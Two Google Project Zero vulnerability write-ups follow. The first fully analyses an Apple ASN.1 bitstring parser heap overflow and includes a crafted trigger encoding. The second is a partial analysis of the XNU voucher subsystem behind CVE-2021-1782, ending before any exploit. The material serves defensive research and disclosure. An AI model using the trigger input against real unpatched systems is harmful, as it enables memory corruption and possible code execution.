That Length field is not the size of the allocated Data buffer. It's a (type-specific) count which determines how many bits or bytes of the buffer pointed to by Data are valid. I say type-specific because for bit-strings Length is stored in units of bits but for other strings it's in units of bytes. (CVE-2016-1950 was a bug in NSS where the code mixed up those units.)

Rather than storing the allocated buffer size along with the buffer pointer, each time a substring/child string is encountered the parser walks back up the stack of currently-being-parsed states to find the inner-most definite length string. As it's walking up the states it examines each state to determine how much of its input it has consumed in order to be able to determine whether it's the case that the current to-be-parsed substring is indeed completely enclosed within the inner-most enclosing definite length string.

If that sounds complicated, it is! The logic which does this is here, and it took me a good few days to pull it apart enough to figure out what this was doing:

sec_asn1d_state *parent = sec_asn1d_get_enclosing_construct(state);

while (parent && parent->indefinite) {

parent = sec_asn1d_get_enclosing_construct(parent);

}

unsigned long remaining = parent->pending;

parent = state;

do {

if (!sec_asn1d_check_and_subtract_length(&remaining,

parent->consumed,

state->top)

||

/* If parent->indefinite is true, parent->contents_length is

* zero and this is a no-op. */

!sec_asn1d_check_and_subtract_length(&remaining,

parent->contents_length,

state->top)

||

/* If parent->indefinite is true, then ensure there is enough

* space for an EOC tag of 2 bytes. */

( parent->indefinite

&&

!sec_asn1d_check_and_subtract_length(&remaining,

2,

state->top)

)

) {

/* This element is larger than its enclosing element, which is

* invalid. */

return;

}

} while ((parent = sec_asn1d_get_enclosing_construct(parent))

&&

parent->indefinite);

It first walks up the state stack to find the innermost constructed definite state and uses its state->pending value as an upper bound. It then walks the state stack again and for each in-between state subtracts from that original value of pending how many bytes could have been consumed by those in between states. It's pretty clear that the pending value is therefore vitally important; it's used to determine an upper bound so if we could mess with it this "bounds check" could go wrong.

After figuring out that this was pretty clearly the only place where any kind of bounds checking takes place I looked back at the fix more closely.

We know that sec_asn1d_parse_bit_string is only the function which changed:

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

const char *buf, unsigned long len)

{

unsigned char byte;

/*PORT_Assert (state->pending > 0); */

PORT_Assert (state->place == beforeBitString);

if ((state->pending == 0) || (state->contents_length == 1)) {

if (state->dest != NULL) {

SecAsn1Item *item = (SecAsn1Item *)(state->dest);

item->Data = NULL;

item->Length = 0;

state->place = beforeEndOfContents;

}

if(state->contents_length == 1) {

/* skip over (unused) remainder byte */

return 1;

}

else {

return 0;

}

if (len == 0) {

state->top->status = needBytes;

return 0;

}

byte = (unsigned char) *buf;

if (byte > 7) {

dprintf("decodeError: parse_bit_string remainder oflow\n");

PORT_SetError (SEC_ERROR_BAD_DER);

state->top->status = decodeError;

return 0;

}

state->bit_string_unused_bits = byte;

state->place = duringBitString;

state->pending -= 1;

return 1;

}

The highlighted region of the function are the characters which were removed by the patch. This function is meant to return the number of input bytes (pointed to by buf) which it consumed and my initial hunch was to notice that the patch removed a path through this function where you could get the count of input bytes consumed and pending out-of-sync. It should be the case that when they return 1 in the removed code they also decrement state->pending, as they do in the other place where this function returns 1.

I spent quite a while trying to figure out how you could actually turn that into something useful but in the end I don't think you can.

So what else is going on here?

This state is reached with buf pointing to the first byte after the length value of a primitive bitstring. state->contents_length is the value of that parsed length. Bitstrings, as discussed earlier, are a unique ASN.1 string type in that they have an extra meta-data byte at the beginning (the unused-bits count byte.) It's perfectly fine to have a definite zero-length string - indeed that's (sort-of) handled earlier than this in the prepareForContents state, which short-circuits straight to afterEndOfContents:

if (state->contents_length == 0 && (! state->indefinite)) {

/*

* A zero-length simple or constructed string; we are done.

*/

state->place = afterEndOfContents;

Here they're detecting a definite-length string type with a content length of 0. But this doesn't handle the edge case of a bitstring which consists only of the unused-bits count byte. The state->contents_length value of that bitstring will be 1, but it doesn't actually have any "contents".

It's this case which the (state->contents_length == 1) conditional in sec_asn1d_parse_bit_string matches:

if ((state->pending == 0) || (state->contents_length == 1)) {

if (state->dest != NULL) {

SecAsn1Item *item = (SecAsn1Item *)(state->dest);

item->Data = NULL;

item->Length = 0;

state->place = beforeEndOfContents;

}

if(state->contents_length == 1) {

/* skip over (unused) remainder byte */

return 1;

}

else {

return 0;

}

By setting state->place to beforeEndOfContents they are again trying to short-circuit the state machine to skip ahead to the state after the string contents have been consumed. But here they take an additional step which they didn't take when trying to achieve exactly the same thing in prepareForContents. In addition to updating state->place they also NULL out the dest SecAsn1Item's Data field and set the Length to 0.

I mentioned earlier that the new child states which are allocated to recursively parse the sub-strings of constructed strings get a copy of the parent's dest field (which is a pointer to a pointer to the output buffer.) This makes sense: that output buffer is only allocated once then gets recursively filled-in in a linear fashion by the children. (Technically this isn't actually how it works if the outermost string is indefinite length, there's separate handling for that case which instead builds a linked-list of substrings which are eventually concatenated, see sec_asn1d_concat_substrings.)

If the output buffer is only allocated once, what happens if you set Data to NULL like they do here? Taking a step back, does that actually make any sense at all?

No, I don't think it makes any sense. Setting Data to NULL at this point should at the very least cause a memory leak, as it's the only pointer to the output buffer.

The fun part though is that that's not the only consequence of NULLing out that pointer. item->Data is used to signal something else.

Here's a snippet from prepare_for_contents when it's determining whether there's enough space in the output buffer for this substring

} else if (state->substring) {

/*

* If we are a substring of a constructed string, then we may

* not have to allocate anything (because our parent, the

* actual constructed string, did it for us). If we are a

* substring and we *do* have to allocate, that means our

* parent is an indefinite-length, so we allocate from our pool;

* later our parent will copy our string into the aggregated

* whole and free our pool allocation.

*/

if (item->Data == NULL) {

PORT_Assert (item->Length == 0);

poolp = state->top->our_pool;

} else {

alloc_len = 0;

}

As the comment implies, if both item->Data is NULL at this point and state->substring is true, then (they believe) it must be the case that they are currently parsing a substring of an outer-level indefinite string, which has no definite-sized buffer already allocated. In that case the meaning of the item->Data pointer is different to that which we describe earlier: it's merely a temporary buffer meant to hold only this substring. Just above here alloc_len was set to the content length of this substring; and for the outer-definite-length case it's vitally important that alloc_len then gets set to 0 here (which is really indicating that a buffer has already been allocated and they must not allocate a new one.)

To emphasize the potentially subtle point: the issue is that using this conjunction (state->substring && !item->Data) for determining whether this a substring of a definite length or outer-level-indefinite string is not the same as the method used by the convoluted bounds checking code we saw earlier. That method walks up the current state stack and checks the indefinite bits of the super-strings to determine whether they're processing a substring of an outer-level-indefinite string.

Putting that all together, you might be able to see where this is going... (but it is still pretty subtle.)

Assume that we have an outer definite-length constructed bitstring with three primitive bitstrings as substrings:

Upon encountering the first outer-most definite length constructed bitstring, the code will allocate a fixed-size buffer, large enough to store all the remaining input which makes up this string, which in this case is 42 bytes. At this point dest->Data points to that buffer.

They then allocate a child state, which gets a copy of the dest pointer (not a copy of the dest SecAsn1Item object; a copy of a pointer to it), and proceed to parse the first child substring.

This is a primitive bitstring with a length of 1 which triggers the vulnerable path in sec_asn1d_parse_bit_string and sets dest->Data to NULL. The state machine skips ahead to beforeEndOfContents then eventually the next substring gets parsed - this time with dest->Data == NULL.

Now the logic goes wrong in a bad way and, as we saw in the snippet above, a new dest->Data buffer gets allocated which is the size of only this substring (2 bytes) when in fact dest->Data should already point to a buffer large enough to hold the entire outer-level-indefinite input string. This bitstring's contents then get parsed and copied into that buffer.

Now we come to the third substring. dest->Data is no longer NULL; but the code now has no way of determining that the buffer was in fact only (erroneously) allocated to hold a single substring. It believes the invariant that item->Data only gets allocated once, when the first outer-level definite length string is encountered, and it's that fact alone which it uses to determine whether dest->Data points to a buffer large enough to have this substring appended to it. It then happily appends this third substring, writing outside the bounds of the buffer allocated to store only the second substring.

This gives you a great memory corruption primitive: you can cause allocations of a controlled size and then overflow them with an arbitrary number of arbitrary bytes.

Here's an example encoding for an ASN.1 bitstring which triggers this issue:

uint8_t concat_bitstrings_constructed_definite_with_zero_len_realloc[]

= {ASN1_CLASS_UNIVERSAL | ASN1_CONSTRUCTED | ASN1_BIT_STRING, // (0x23)

0x4a, // initial allocation size

ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

0x1, // force item->Data = NULL

0x0, // number of unused bits in the final byte

ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

0x2, // this is the reallocation size

0x0, // number of unused bits in the final byte

0xff, // only byte of bitstring

ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

0x41, // 64 actual bytes, plus the remainder, will cause 0x40 byte memcpy one byte in to 2 byte allocation

0x0, // number of unused bits in the final byte

0xff,

0xff,// -- continues for overflow

Why wasn't this found by fuzzing?

This is a reasonable question to ask. This source code is really really hard to audit, even with the diff it was at least a week of work to figure out the true root cause of the bug. I'm not sure if I would have spotted this issue during a code audit. It's very broken but it's quite subtle and you have to figure out a lot about the state machine and the bounds-checking rules to see it - I think I might have given up before I figured it out and gone to look for something easier.

But the trigger test-case is neither structurally complex nor large, and feels within-grasp for a fuzzer. So why wasn't it found? I'll offer two points for discussion:

Perhaps it's not being fuzzed?

Or at least, it's not being fuzzed in the exact form which it appears in Apple's Security.framework library. I understand that both Mozilla and Google do fuzz the NSS ASN.1 parser and have found a bunch of vulnerabilities, but note that the key part of the vulnerable code ("|| (state->contents_length == 1" in sec_asn1d_parse_bit_string) isn't present in upstream NSS (more on that below.)

Can it be fuzzed effectively?

Even if you did build the Security.framework version of the code and used a coverage guided fuzzer, you might well not trigger any crashes. The code uses a custom heap allocator and you'd have to either replace that with direct calls to the system allocator or use ASAN's custom allocator hooks. Note that upstream NSS does do that, but as I understand it, Apple's fork doesn't.

History

I'm always interested in not just understanding how a vulnerability works but how it was introduced. This case is a particularly compelling example because once you understand the bug, the code construct initially looks extremely suspicious. It only exists in Apple's fork of NSS and the only impact of that change is to introduce a perfect memory corruption primitive. But let's go through the history of the code to convince ourselves that it is much more likely that it was just an unfortunate accident:

The earliest reference to this code I can find is this, which appears to be the initial checkin in the Mozilla CVS repo on March 31, 2000:

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

const char *buf, unsigned long len)

{

unsigned char byte;

PORT_Assert (state->pending > 0);

PORT_Assert (state->place == beforeBitString);

if (len == 0) {

state->top->status = needBytes;

return 0;

}

byte = (unsigned char) *buf;

if (byte > 7) {

PORT_SetError (SEC_ERROR_BAD_DER);

state->top->status = decodeError;

return 0;

}

state->bit_string_unused_bits = byte;

state->place = duringBitString;

state->pending -= 1;

return 1;

}

On August 24th, 2001 the form of the code changed to something like the current version, in this commit with the message "Memory leak fixes.":

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

const char *buf, unsigned long len)

{

unsigned char byte;

- PORT_Assert (state->pending > 0);

/*PORT_Assert (state->pending > 0); */

PORT_Assert (state->place == beforeBitString);

+ if (state->pending == 0) {

+ if (state->dest != NULL) {

+ SECItem *item = (SECItem *)(state->dest);

+ item->data = NULL;

+ item->len = 0;

+ state->place = beforeEndOfContents;

+ return 0;

+ }

if (len == 0) {

state->top->status = needBytes;

return 0;

}

byte = (unsigned char) *buf;

if (byte > 7) {

PORT_SetError (SEC_ERROR_BAD_DER);

state->top->status = decodeError;

return 0;

}

state->bit_string_unused_bits = byte;

state->place = duringBitString;

state->pending -= 1;

return 1;

}

This commit added the item->data = NULL line but here it's only reachable when pending == 0. I am fairly convinced that this was dead code and not actually reachable (and that the PORT_Assert which they commented out was actually valid.)

The beforeBitString state (which leads to the sec_asn1d_parse_bit_string method being called) will always be preceded by the afterLength state (implemented by sec_asn1d_prepare_for_contents.) On entry to the afterLength state state->contents_length is equal to the parsed length field and sec_asn1d_prepare_for_contents does:

state->pending = state->contents_length;

So in order to reach sec_asn1d_parse_bit_string with state->pending == 0, state->contents_length would also need to be 0 in sec_asn1d_prepare_for_contents.

That means that in the if/else decision tree below, at least one of the two conditionals must be true:

if (state->contents_length == 0 && (! state->indefinite)) {

/*

* A zero-length simple or constructed string; we are done.

*/

state->place = afterEndOfContents;

...

} else if (state->indefinite) {

/*

* An indefinite-length string *must* be constructed!

*/

dprintf("decodeError: prepare for contents indefinite not construncted\n");

PORT_SetError (SEC_ERROR_BAD_DER);

state->top->status = decodeError;

yet it is required that neither of those be true in order to reach the final else which is the only path to reaching sec_asn1d_parse_bit_string via the beforeBitString state:

} else {

/*

* A non-zero-length simple string.

*/

if (state->underlying_kind == SEC_ASN1_BIT_STRING)

state->place = beforeBitString;

else

state->place = duringLeaf;

}

So at that point (24 August 2001) the NSS codebase had some dead code which looked like it was trying to handle parsing an ASN.1 bitstring which didn't have an unused-bits byte. As we've seen in the rest of this post though, that handling is quite wrong, but it didn't matter as the code was unreachable.

The earliest reference to Apple's fork of that NSS code I can find is in the SecurityNssAsn1-11 package for OS X 10.3 (Panther) which would have been released October 24th, 2003. In that project we can find a CHANGES.apple file which tells us a little more about the origins of Apple's fork:

General Notes

-------------

1. This module, SecurityNssAsn1, is based on the Netscape Security

Services ("NSS") portion of the Mozilla Browser project. The

source upon which SecurityNssAsn1 was based was pulled from

the Mozilla CVS repository, top of tree as of January 21, 2003.

The SecurityNssAsn1 project contains only those portions of NSS

used to perform BER encoding and decoding, along with minimal

support required by the encode/decode routines.

2. The directory structure of SecurityNssAsn1 differs significantly

from that of NSS, rendering simple diffs to document changes

unwieldy. Diffs could still be performed on a file-by-file basis.

3. All Apple changes are flagged by the symbol __APPLE__, either

via "#ifdef __APPLE__" or in a comment.

That document continues on to outline a number of broad changes which Apple made to the code, including reformatting the code and changing a number of APIs to add new features. We also learn the date at which Apple forked the code (January 21, 2003) so we can go back through a github mirror of the mozilla CVS repository to find the version of secasn1d.c as it would have appeared then and diff them.

From that diff we can see that the Apple developers actually made fairly significant changes in this initial import, indicating that this code underwent some level of review prior to importing it. For example:

@@ -1584,7 +1692,15 @@

/*

* If our child was just our end-of-contents octets, we are done.

*/

+ #ifdef __APPLE__

+ /*

+ * Without the check for !child->indefinite, this path could

+ * be taken erroneously if the child is indefinite!

+ */

+ if(child->endofcontents && !child->indefinite) {

+ #else

if (child->endofcontents) {

They were pretty clearly looking for potential correctness issues with the code while they were refactoring it. The example shown above is a non-trivial change and one which persists to this day. (And I have no idea whether the NSS or Apple version is correct!) Reading the diff we can see that not every change ended up being marked with #ifdef __APPLE__ or a comment. They also made this change to sec_asn1d_parse_bit_string:

@@ -1372,26 +1469,33 @@

/*PORT_Assert (state->pending > 0); */

PORT_Assert (state->place == beforeBitString);

- if (state->pending == 0) {

- if (state->dest != NULL) {

- SECItem *item = (SECItem *)(state->dest);

- item->data = NULL;

- item->len = 0;

- state->place = beforeEndOfContents;

- return 0;

- }

+ if ((state->pending == 0) || (state->contents_length == 1)) {

+ if (state->dest != NULL) {

+ SECItem *item = (SECItem *)(state->dest);

+ item->Data = NULL;

+ item->Length = 0;

+ state->place = beforeEndOfContents;

+ }

+ if(state->contents_length == 1) {

+ /* skip over (unused) remainder byte */

+ return 1;

+ }

+ else {

+ return 0;

+ }

}

In the context of all the other changes in this initial import this change looks much less suspicious than I first thought. My guess is that the Apple developers thought that Mozilla had missed handling the case of a bitstring with only the unused-bits bytes and attempted to add support for it. It looks like the state->pending == 0 conditional must have been Mozilla's check for handling a 0-length bitstring so therefore it was quite reasonable to think that the way it was handling that case by NULLing out item->data was the right thing to do, so it must also be correct to add the contents_length == 1 case here.

In reality the contents_length == 1 case was handled perfectly correctly anyway in sec_asn1d_parse_more_bit_string, but it wasn't unreasonable to assume that it had been overlooked based on what looked like a special case handling for the missing unused-bits byte in sec_asn1d_parse_bit_string.

The fix for the bug was simply to revert the change made during the initial import 18 years ago, making the dangerous but unreachable code unreachable once more:

if ((state->pending == 0) || (state->contents_length == 1)) {

if (state->dest != NULL) {

SecAsn1Item *item = (SecAsn1Item *)(state->dest);

item->Data = NULL;

item->Length = 0;

state->place = beforeEndOfContents;

}

if(state->contents_length == 1) {

/* skip over (unused) remainder byte */

return 1;

}

else {

return 0;

}

Conclusions

Forking complicated code is complicated. In this case it took almost two decades to in the end just revert a change made during import. Even verifying whether this revert is correct is really hard.

The Mozilla and Apple codebases have continued to diverge since 2003. As I discovered slightly too late to be useful, the Mozilla code now has more comments trying to explain the decoder's "novel" memory safety approach.

Rewriting this code to be more understandable (and maybe even memory safe) is also distinctly non-trivial. The code doesn't just implement ASN.1 decoding; it also has to support safely decoding incorrectly encoded data, as described by this verbatim comment for example:

/*

* Okay, this is a hack. It *should* be an error whether

* pending is too big or too small, but it turns out that

* we had a bug in our *old* DER encoder that ended up

* counting an explicit header twice in the case where

* the underlying type was an ANY. So, because we cannot

* prevent receiving these (our own certificate server can

* send them to us), we need to be lenient and accept them.

* To do so, we need to pretend as if we read all of the

* bytes that the header said we would find, even though

* we actually came up short.

*/

Verifying that a rewritten, simpler decoder also handles every hard-coded edge case correctly probably leads to it not being so simple after all.

Google Project Zero
CVE-2021-1782, an iOS in-the-wild vulnerability in vouchersAnonymous
14 April 2022 at 15:58

CVE-2021-1782, an iOS in-the-wild vulnerability in vouchers

Google Project Zero

By: Anonymous

14 April 2022 at 15:58

Posted by Ian Beer, Google Project Zero

This blog post is my analysis of a vulnerability exploited in the wild and patched in early 2021. Like the writeup published last week looking at an ASN.1 parser bug, this blog post is based on the notes I took as I was analyzing the patch and trying to understand the XNU vouchers subsystem. I hope that this writeup serves as the missing documentation for how some of the internals of the voucher subsystem works and its quirks which lead to this vulnerability.

CVE-2021-1782 was fixed in iOS 14.4, as noted by @s1guza on twitter:

This vulnerability was fixed on January 26th 2021, and Apple updated the iOS 14.4 release notes on May 28th 2021 to indicate that the issue may have been actively exploited:

Vouchers

What exactly is a voucher?

The kernel code has a concise description:

Vouchers are a reference counted immutable (once-created) set of indexes to particular resource manager attribute values (which themselves are reference counted).

That definition is technically correct, though perhaps not all that helpful by itself.

To actually understand the root cause and exploitability of this vulnerability is going to require covering a lot of the voucher codebase. This part of XNU is pretty obscure, and pretty complicated.

A voucher is a reference-counted table of keys and values. Pointers to all created vouchers are stored in the global ivht_bucket hash table.

For a particular set of keys and values there should only be one voucher object. During the creation of a voucher there is a deduplication stage where the new voucher is compared against all existing vouchers in the hashtable to ensure they remain unique, returning a reference to the existing voucher if a duplicate has been found.

Here's the structure of a voucher:

struct ipc_voucher {

iv_index_t iv_hash; /* checksum hash */

iv_index_t iv_sum; /* checksum of values */

os_refcnt_t iv_refs; /* reference count */

iv_index_t iv_table_size; /* size of the voucher table */

iv_index_t iv_inline_table[IV_ENTRIES_INLINE];

iv_entry_t iv_table; /* table of voucher attr entries */

ipc_port_t iv_port; /* port representing the voucher */

queue_chain_t iv_hash_link; /* link on hash chain */

};

#define IV_ENTRIES_INLINE MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN

The voucher codebase is written in a very generic, extensible way, even though its actual use and supported feature set is quite minimal.

Keys

Keys in vouchers are not arbitrary. Keys are indexes into a voucher's iv_table; a value's position in the iv_table table determines what "key" it was stored under. Whilst the vouchers codebase supports the runtime addition of new key types this feature isn't used and there are just a small number of fixed, well-known keys:

#define MACH_VOUCHER_ATTR_KEY_ALL ((mach_voucher_attr_key_t)~0)

#define MACH_VOUCHER_ATTR_KEY_NONE ((mach_voucher_attr_key_t)0)

/* other well-known-keys will be added here */

#define MACH_VOUCHER_ATTR_KEY_ATM ((mach_voucher_attr_key_t)1)

#define MACH_VOUCHER_ATTR_KEY_IMPORTANCE ((mach_voucher_attr_key_t)2)

#define MACH_VOUCHER_ATTR_KEY_BANK ((mach_voucher_attr_key_t)3)

#define MACH_VOUCHER_ATTR_KEY_PTHPRIORITY ((mach_voucher_attr_key_t)4)

#define MACH_VOUCHER_ATTR_KEY_USER_DATA ((mach_voucher_attr_key_t)7)

#define MACH_VOUCHER_ATTR_KEY_TEST ((mach_voucher_attr_key_t)8)

#define MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN MACH_VOUCHER_ATTR_KEY_TEST

The iv_inline_table in an ipc_voucher has 8 entries. But of those, only four are actually supported and have any associated functionality. The ATM voucher attributes are deprecated and the code supporting them is gone so only IMPORTANCE (2), BANK (3), PTHPRIORITY (4) and USER_DATA (7) are valid keys. There's some confusion (perhaps on my part) about when exactly you should use the term key and when attribute; I'll use them interchangeably to refer to these key values and the corresponding "types" of values which they manage. More on that later.

Values

Each entry in a voucher iv_table is an iv_index_t:

typedef natural_t iv_index_t;

Each value is again an index; this time into a per-key cache of values, abstracted as a "Voucher Attribute Cache Control Object" represented by this structure:

struct ipc_voucher_attr_control {

os_refcnt_t ivac_refs;

boolean_t ivac_is_growing; /* is the table being grown */

ivac_entry_t ivac_table; /* table of voucher attr value entries */

iv_index_t ivac_table_size; /* size of the attr value table */

iv_index_t ivac_init_table_size; /* size of the attr value table */

iv_index_t ivac_freelist; /* index of the first free element */

ipc_port_t ivac_port; /* port for accessing the cache control */

lck_spin_t ivac_lock_data;

iv_index_t ivac_key_index; /* key index for this value */

};

These are accessed indirectly via another global table:

static ipc_voucher_global_table_element iv_global_table[MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN];

(Again, the comments in the code indicate that in the future that this table may grow in size and allow attributes to be managed in userspace, but for now it's just a fixed size array.)

Each element in that table has this structure:

typedef struct ipc_voucher_global_table_element {

ipc_voucher_attr_manager_t ivgte_manager;

ipc_voucher_attr_control_t ivgte_control;

mach_voucher_attr_key_t ivgte_key;

} ipc_voucher_global_table_element;

Both the iv_global_table and each voucher's iv_table are indexed by (key-1), not key, so the userdata entry is [6], not [7], even though the array still has 8 entries.

The ipc_voucher_attr_control_t provides an abstract interface for managing "values" and the ipc_voucher_attr_manager_t provides the "type-specific" logic to implement the semantics of each type (here by type I mean "key" or "attr" type.) Let's look more concretely at what that means. Here's the definition of ipc_voucher_attr_manager_t:

struct ipc_voucher_attr_manager {

ipc_voucher_attr_manager_release_value_t ivam_release_value;

ipc_voucher_attr_manager_get_value_t ivam_get_value;

ipc_voucher_attr_manager_extract_content_t ivam_extract_content;

ipc_voucher_attr_manager_command_t ivam_command;

ipc_voucher_attr_manager_release_t ivam_release;

ipc_voucher_attr_manager_flags ivam_flags;

};

ivam_flags is an int containing some flags; the other five fields are function pointers which define the semantics of the particular attr type. Here's the ipc_voucher_attr_manager structure for the user_data type:

const struct ipc_voucher_attr_manager user_data_manager = {

.ivam_release_value = user_data_release_value,

.ivam_get_value = user_data_get_value,

.ivam_extract_content = user_data_extract_content,

.ivam_command = user_data_command,

.ivam_release = user_data_release,

.ivam_flags = IVAM_FLAGS_NONE,

};

Those five function pointers are the only interface from the generic voucher code into the type-specific code. The interface may seem simple but there are some tricky subtleties in there; we'll get to that later!

Let's go back to the generic ipc_voucher_attr_control structure which maintains the "values" for each key in a type-agnostic way. The most important field is ivac_entry_t ivac_table, which is an array of ivac_entry_s's. It's an index into this table which is stored in each voucher's iv_table.

Here's the structure of each entry in that table:

struct ivac_entry_s {

iv_value_handle_t ivace_value;

iv_value_refs_t ivace_layered:1, /* layered effective entry */

ivace_releasing:1, /* release in progress */

ivace_free:1, /* on freelist */

ivace_persist:1, /* Persist the entry, don't

count made refs */

ivace_refs:28; /* reference count */

union {

iv_value_refs_t ivaceu_made; /* made count (non-layered) */

iv_index_t ivaceu_layer; /* next effective layer

(layered) */

} ivace_u;

iv_index_t ivace_next; /* hash or freelist */

iv_index_t ivace_index; /* hash head (independent) */

};

ivace_refs is a reference count for this table index. Note that this entry is inline in an array; so this reference count going to zero doesn't cause the ivac_entry_s to be free'd back to a kernel allocator (like the zone allocator for example.) Instead, it moves this table index onto a freelist of empty entries. The table can grow but never shrink.

Table entries which aren't free store a type-specific "handle" in ivace_value. Here's the typedef chain for that type:

iv_value_handle_t ivace_value

typedef mach_voucher_attr_value_handle_t iv_value_handle_t;

typedef uint64_t mach_voucher_attr_value_handle_t;

The handle is a uint64_t but in reality the attrs can (and do) store pointers there, hidden behind casts.

A guarantee made by the attr_control is that there will only ever be one (live) ivac_entry_s for a particular ivace_value. This means that each time a new ivace_value needs an ivac_entry the attr_control's ivac_table needs to be searched to see if a matching value is already present. To speed this up in-use ivac_entries are linked together in hash buckets so that a (hopefully significantly) shorter linked-list of entries can be searched rather than a linear scan of the whole table. (Note that it's not a linked-list of pointers; each link in the chain is an index into the table.)

Userdata attrs

user_data is one of the four types of supported, implemented voucher attr types. It's only purpose is to manage buffers of arbitrary, user controlled data. Since the attr_control performs deduping only on the ivace_value (which is a pointer) the userdata attr manager is responsible for ensuring that userdata values which have identical buffer values (matching length and bytes) have identical pointers.

To do this it maintains a hash table of user_data_value_element structures, which wrap a variable-sized buffer of bytes:

struct user_data_value_element {

mach_voucher_attr_value_reference_t e_made;

mach_voucher_attr_content_size_t e_size;

iv_index_t e_sum;

iv_index_t e_hash;

queue_chain_t e_hash_link;

uint8_t e_data[];

};

Each inline e_data buffer can be up to 16KB. e_hash_link stores the hash-table bucket list pointer.

e_made is not a simple reference count. Looking through the code you'll notice that there are no places where it's ever decremented. Since there should (nearly) always be a 1:1 mapping between an ivace_entry and a user_data_value_element this structure shouldn't need to be reference counted. There is however one very fiddly race condition (which isn't the race condition which causes the vulnerability!) which necessitates the e_made field. This race condition is sort-of documented and we'll get there eventually...

Recipes

The host_create_mach_voucher host port MIG (Mach Interface Generator) method is the userspace interface for creating vouchers:

kern_return_t

host_create_mach_voucher(mach_port_name_t host,

mach_voucher_attr_raw_recipe_array_t recipes,

mach_voucher_attr_recipe_size_t recipesCnt,

mach_port_name_t *voucher);

recipes points to a buffer filled with a sequence of packed variable-size mach_voucher_attr_recipe_data structures:

typedef struct mach_voucher_attr_recipe_data {

mach_voucher_attr_key_t key;

mach_voucher_attr_recipe_command_t command;

mach_voucher_name_t previous_voucher;

mach_voucher_attr_content_size_t content_size;

uint8_t content[];

} mach_voucher_attr_recipe_data_t;

key is one of the four supported voucher attr types we've seen before (importance, bank, pthread_priority and user_data) or a wildcard value (MACH_VOUCHER_ATTR_KEY_ALL) indicating that the command should apply to all keys. There are a number of generic commands as well as type-specific commands. Commands can optionally refer to existing vouchers via the previous_voucher field, which should name a voucher port.

Here are the supported generic commands for voucher creation:

MACH_VOUCHER_ATTR_COPY: copy the attr value from the previous voucher. You can specify the wildcard key to copy all the attr values from the previous voucher.

MACH_VOUCHER_ATTR_REMOVE: remove the specified attr value from the voucher under construction. This can also remove all the attributes from the voucher under construction (which, arguably, makes no sense.)

MACH_VOUCHER_ATTR_SET_VALUE_HANDLE: this command is only valid for kernel clients; it allows the caller to specify an arbitrary ivace_value, which doesn't make sense for userspace and shouldn't be reachable.

MACH_VOUCHER_ATTR_REDEEM: the semantics of redeeming an attribute from a previous voucher are not defined by the voucher code; it's up to the individual managers to determine what that might mean.

Here are the attr-specific commands for voucher creation for each type:

bank:

MACH_VOUCHER_ATTR_BANK_CREATE

MACH_VOUCHER_ATTR_BANK_MODIFY_PERSONA

MACH_VOUCHER_ATTR_AUTO_REDEEM

MACH_VOUCHER_ATTR_SEND_PREPROCESS

importance:

MACH_VOUCHER_ATTR_IMPORTANCE_SELF

user_data:

MACH_VOUCHER_ATTR_USER_DATA_STORE

pthread_priority:

MACH_VOUCHER_ATTR_PTHPRIORITY_CREATE

Note that there are further commands which can be "executed against" vouchers via the mach_voucher_attr_command MIG method which calls the attr manager's ivam_command function pointer. Those are:

bank:

BANK_ORIGINATOR_PID

BANK_PERSONA_TOKEN

BANK_PERSONA_ID

importance:

MACH_VOUCHER_IMPORTANCE_ATTR_DROP_EXTERNAL

user_data:

none

pthread_priority:

none

Let's look at example recipe for creating a voucher with a single user_data attr, consisting of the 4 bytes {0x41, 0x41, 0x41, 0x41}:

struct udata_dword_recipe {

mach_voucher_attr_recipe_data_t recipe;

uint32_t payload;

};

struct udata_dword_recipe r = {0};

r.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

r.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

r.recipe.content_size = sizeof(uint32_t);

r.payload = 0x41414141;

Let's follow the path of this recipe in detail.

Here's the most important part of host_create_mach_voucher showing the three high-level phases: voucher allocation, attribute creation and voucher de-duping. It's not the responsibility of this code to find or allocate a mach port for the voucher; that's done by the MIG layer code.

/* allocate new voucher */

voucher = iv_alloc(ivgt_keys_in_use);

if (IV_NULL == voucher) {

return KERN_RESOURCE_SHORTAGE;

}

/* iterate over the recipe items */

while (0 < recipe_size - recipe_used) {

ipc_voucher_t prev_iv;

if (recipe_size - recipe_used < sizeof(*sub_recipe)) {

kr = KERN_INVALID_ARGUMENT;

break;

}

/* find the next recipe */

sub_recipe =

(mach_voucher_attr_recipe_t)(void *)&recipes[recipe_used];

if (recipe_size - recipe_used - sizeof(*sub_recipe) <

sub_recipe->content_size) {

kr = KERN_INVALID_ARGUMENT;

break;

}

recipe_used += sizeof(*sub_recipe) + sub_recipe->content_size;

/* convert voucher port name (current space) */

/* into a voucher reference */

prev_iv =

convert_port_name_to_voucher(sub_recipe->previous_voucher);

if (MACH_PORT_NULL != sub_recipe->previous_voucher &&

IV_NULL == prev_iv) {

kr = KERN_INVALID_CAPABILITY;

break;

}

kr = ipc_execute_voucher_recipe_command(

voucher,

sub_recipe->key,

sub_recipe->command,

prev_iv,

sub_recipe->content,

sub_recipe->content_size,

FALSE);

ipc_voucher_release(prev_iv);

if (KERN_SUCCESS != kr) {

break;

}

if (KERN_SUCCESS == kr) {

*new_voucher = iv_dedup(voucher);

} else {

*new_voucher = IV_NULL;

iv_dealloc(voucher, FALSE);

}

At the top of this snippet a new voucher is allocated in iv_alloc. ipc_execute_voucher_recipe_command is then called in a loop to consume however many sub-recipe structures were provided by userspace. Each sub-recipe can optionally refer to an existing voucher via the sub-recipe previous_voucher field. Note that MIG doesn't natively support variable-sized structures containing ports so it's passed as a mach port name which is looked up in the calling task's mach port namespace and converted to a voucher reference by convert_port_name_to_voucher. The intended functionality here is to be able to refer to attrs in other vouchers to copy or "redeem" them. As discussed, the semantics of redeeming a voucher attr isn't defined by the abstract voucher code and it's up to the individual attr managers to decide what that means.

